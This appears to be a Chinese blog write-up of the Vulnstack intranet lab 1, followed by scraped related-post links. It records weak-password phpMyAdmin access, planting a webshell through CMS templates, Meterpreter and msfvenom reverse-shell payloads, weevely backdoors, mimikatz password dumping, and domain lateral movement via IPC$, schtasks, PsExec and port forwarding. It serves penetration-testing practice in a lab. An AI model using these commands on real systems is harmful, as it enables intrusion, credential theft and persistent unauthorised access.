最近发现了一个内网的靶场网站,简单配置一下网络就可以,不用自己搭建这么麻烦漏洞信息 (qiyuanxuetang.net)

环境配置

内网1靶场由三台机器构成:WIN7、2008 server、2003 server

其中WIN7做为对外的web机,2008作为域控

WIN7添加一个网卡,一个设为仅主机,一个设为NET

2003、2008 设为仅主机

初始密码hongrisec@2019

信息收集

深入探测

80端口和3306端口 ,查看80端口

一个phpstudy的探针界面,一般来说后台登陆界面就是phpmyadmin,扫了之后果然

直接弱口令root root尝试登陆,直接登陆上了后台

注意到里面有个叫newxycms的数据库,说明肯定还有其他网站,尝试了yx,newyxcms,yxcms得到子域名yxcms

一个小提示

进入后台之后,注意到了一个上传文件管理,但是我没有找到上传文件的地方

然后看到了前台模板这边,发现可以更改php文件,将原来的php文件里的东西都删了,写入msf生成的木马,或者创建一个新的php代码写入msf代码(真实情况下还是创建好,后期清理痕迹的时候方便)

但是改了之后发现一个问题,不知道这个文件的路径是什么,查了wp发现原来扫描的时候扫出来了一个rar网站备份文件,后来我换了一个字典扫也扫出来了,看来以后扫描信息泄露啥的还得换字典多扫几次。

得到了备份文件,知道了文件的绝对路径,那就可以连接木马getshell了

GetShell

刚刚写入了msf的木马,使用msf连接木马

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lHOST 192.168.200.6
run

 访问文件路径

但是这个shell效果不太好,输入了shell之后就卡住了然后自动断开了连接

然后查看了一下网上的,都是用蚁剑连接,没有人用msf,然后我就试了试weevely生成后门,然后写上去后连接 

weevely generate test test.php  //生成后门
weevely http://192.168.200.27/yxcms/protected/apps/default/view/default/door.php test //连接

 然后使用cs连接weevely生成的shell 

然后再使用cs反弹shell给msf Cobalt Strike - 1_Ry - 博客园 (cnblogs.com)

getsystem提权

进程迁移,将shell迁移到稳定的进程中

内网信息收集

GOD域

输入shell进入系统,ipconfig查看网络,发现内网的ip,可以探测网段确定内网主机ip

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="

共三台主机,其中143是已经被拿下的win7

由于msf收集到很多信息是乱码,后续我用cs继续进行收集

在信息收集的时候会显示RPC错误,是DNS解析问题,解决方法在win7 hosts文件添加owa.god.org

确定域主机名,这里应该还有一个叫STU1的本机名,不知道为什么没显示出来

确定域控名

确定主机名对应的ip地址(第二个ip地址是错的,但是排除法可以得到IP地址)

查看用户

拿到用户和ip地址之后,尝试抓取密码

这里可以通过msf中的mimikatz或者cs中的mimikatz抓取密码,比较幸运直接抓取到了明文密码

域内横向移动

接下来参考我之前学习的域横向知识,可以先建立ipc$连接,然后上传后门运行,也可以使用pstoos工具包中的PsExec。第一次进行域横向的实战,就每种方法都试一试

ipc连接

建立ipc连接

net use \\192.168.52.138\ipc$ "Admin111" /user:Administrator

net use 查看连接

使用cs生成一个windows后门,接着将后门上传至win7

接着通过win7将后门文件上传至域控主机上

shell copy c:\1.exe \\192.168.52.138\c$

确定目标主机时间

使用at或者schtasks创建定时任务运行后门

at \\192.168.52.138 11:49 C:\1.exe
schtasks /create /s 192.168.52.138 /tn test /sc once /st 11:49 /tr C:\1.exe /ru system /f

这里糊涂了,突然发现内网的机器不能直接连上攻击机,需要通过win7作为跳板

PsExec

pstools工具包中的psexec

msf上传

upload /root/PSTools/PsExec.exe C:/psexec.exe

PsExec.exe -accepteula -s \\192.168.52.138 cmd.exe

但是这样还是无法连接远程主机,可能因为还是因为攻击机是外网,后来想到一个办法,创建一个.bat文件,上传到win7,再运行试试看,但还是不行

  

路由,端口转发

 获取目标机内网地址网段

run get_local_subnets

通过background回到msf,使用route增加对应路由,4是sessions值

route add 192.168.52.0 255.255.255.0 4

查看是否设置成功

这样msf就能扫描到内网的主机了

但是设置之后我使用了msf内置的psexec也还是无法攻击成功,这就不知道怎么回事了

端口转发

端口转发可以让攻击机访问本来无法直接访问的目标主机。portfwd可以反弹单个端口到本地并且监听。

在meterpreter会话输入

portfwd add -l 3389 -r 192.168.200.27 -p 3389

-l 本地监听端口
-r 远程地址
-p 远程端口

3389图形操作

在meterpreter会话开启3389端口

run getgui -e
run post/windows/manage/enable_rdp

远程桌面连接

rdesktop 192.168.200.27:3389

这里应该要创建一个新的用户,不然直接登陆的话会挤掉别人的账户

这里直接执行刚刚不能成功的方法,直接获取到域控system权限

接下来尝试反弹shell到kali

首先上传powercat

copy c:\powercat.ps1 \\192.168.52.138\c$

导入powercat需要设置执行策略

但是又失败了,只要运行powershell那个域控的shell就会卡死,根本没法反弹

只能试一下lcx端口转发

重新制作一个木马,ip设置为win7的ip

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.143 LPORT=11111 -f exe > shell.exe

上传到域控,开启监听

lcx -slave 192.168.200.6 4555  192.168.52.143 11111

运行木马,也不行,放弃了 。。

cs中的psexec

首先进行网段的扫描,确定存活主机

这里需要建立SMB监听

之前已经使用mimikatz获取了密码,所以本地有保存,选择SMB监听器,选择会话

成功上线

接下来拿域控也是同样的方法

总结

这个内网靶机难度较低,渗透win7很容易,主要是内网部分,虽然说也不是很难,明文密码都能直接获取,但是第一次实战内网,还是遇到了许多困难,思路有点乱,内网信息收集的时候会不知道收集什么,需要反复查阅笔记,收集完信息之后也不知道怎么域横向了,也是查看笔记才想起来,而且域横向的方法还有特别多,还是需要多多实战。还有上传后门的时候把目标主机搞得一团糟,这就造成了后期清理痕迹带来了很大的工作量,而且在实战环境下也更加容易被发现。但还是收获了很多

Vulnstack内网靶场1的更多相关文章

  1. Vulnstack内网靶场3

    Vulnstack内网靶场3 (qiyuanxuetang.net) 环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行. 挂起状态,账号已默认登陆,cento ...

  2. Vulnstack内网靶场2

    环境配置 内网2靶场由三台机器构成:WIN7.2008 server.2012 server 其中2008做为对外的web机,win7作为个人主机可上网,2012作为域控 网络适配器已经设置好了不用自 ...

  3. Vulnstack内网靶场5

    实验环境搭建 漏洞详情 (qiyuanxuetang.net) "此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集.Web攻防.代码审计.漏洞利用. ...

  4. Vulnstack内网靶场4

    环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内网网段192.168.183.0/24 外网网段192.168.157.0/24 其中Ubuntu作为对外的内网机器 攻击机kali ...

  5. CS内网横向移动 模拟渗透实操 超详细

    @Webkio 前言: 最近在跟朋友搞一些项目玩,所以最近没怎么更新内容接下来我将在虚拟中模拟内网多层靶场,进行内网渗透实验,超详细,适合小白.本文仅供网安学习,不可利用于未授权渗透工作中,否则后果自 ...

  6. 内网渗透之vlunstack靶场

    前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就 ...

  7. 利用MSF实现三层网络的一次内网渗透

    目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为  image/jpeg 上传大马之后发 ...

  8. 利用Metasploit 打入ThinkPHP内网...

    出品|MS08067实验室(www.ms08067.com) 本文作者:dch(Ms08067实验室 SRSP TEAM小组成员) 一.利用Metasploit进行攻击的流程图   Metasploi ...

  9. 【CTF】msf和impacket联合拿域控内网渗透-拿域控

    前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也 ...

随机推荐

  1. 【ArcEngine】AE连接SDE_For_SQLServer参数设置

    SDE for sqlserver直连的ArcEngine访问 Ae中的数据的连接实质还是采用服务连接的方式.连接代码如下: 1 public IWorkspace Getworkspace() 2 ...

  2. java基础路线与详细知识点

    点击下方打开文件查看 还在持续更新中.....

  3. 深入Pulsar Consumer的使用方式&源码分析

    原文链接 1.使用前准备 引入依赖: <dependency> <groupId>org.apache.pulsar</groupId> <artifactI ...

  4. Linux centos 安装 Node.js

    官网下载地址 https://nodejs.org/zh-cn/download/ 1.下载二进制文件 (x64)   相当于  https://nodejs.org/dist/v10.16.3/no ...

  5. <题解>「LibreOJ NOIP Round #1」序列划分

    solutions 题面loj#542 对我来说,这或许已经超出了我的能力,我,只能看题解 不知道我写完这一篇题解之后,会不会对我的构造题有一点点的帮助 让我在这类题的解决上能过有一些提升 直接说明白 ...

  6. .Net Core配置Configuration源码研究

    最近又研究了一下.NetCore配置选项的源码实现,又学习到了不少东西.这篇文章先写一下IConfiguration的学习成果,Options的后面补上 核心类 ConfigurationBuilde ...

  7. LNMP zabbix 4.4 安装

    硬件配置需求 环境 平台 CPU/内存 数据库 硬盘 监控主机数 小型 CentOS 2CPU/1GB MySQL.InnoDB 普通 100 中型 CentOS 2CPU/2GB MySQL.Inn ...

  8. MySQL(二)——常用命令

    一.MySQL服务器1.介绍安装服务:mysqld -install停止服务:net stop mysql启动服务:net start mysql用户名:root,密码:Password,连接数据库: ...

  9. linux中花括弧大括号用法

    {1,3,5}   ==  1 3 5 {1..5}   ==  1  2  3  4  5 {a..e}  ==  a b c d e {A..z} {1..50..2} {1..50..3} {1 ...

  10. ldconfig与 /etc/ld.so.conf

    现在我们知道了动态与静态函数库,也知道了当前的Linux大多是将函数库做成动态函数库,下面来讨论增加函数库读取性能的方法.我们知道,内存的访问速度是硬盘的好几倍,所以,如果将常用的动态函数库加载到内存 ...